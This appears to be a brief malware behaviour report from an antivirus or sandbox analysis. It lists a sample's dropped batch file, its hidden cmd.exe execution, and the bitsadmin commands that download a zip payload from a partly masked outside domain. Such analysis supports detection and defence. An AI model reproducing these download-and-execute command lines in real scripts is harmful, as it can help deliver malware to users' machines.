Technical Information
- %TEMP%\17c0.tmp\17d0.bat
- <Current directory>\bit23e5.tmp
- <Current directory>\bit23e5.tmp
- from <Current directory>\bit23e5.tmp to <Current directory>\xxfw3215.zip
- 'xx##py.com':80
- http://xx##py.com/download/xxfw3215.zip
- DNS ASK xx##py.com
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\17C0.tmp\17D0.bat <Full path to file>" (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\17C0.tmp\17D0.bat <Full path to file>"
- '<SYSTEM32>\cmd.exe' /k bitsadmin.exe /transfer "GET" http://xx##py.com/download/xxfw3215.zip "<Current directory>\xxfw3215.zip"
- '<SYSTEM32>\bitsadmin.exe' /transfer "GET" http://xx##py.com/download/xxfw3215.zip "<Current directory>\xxfw3215.zip"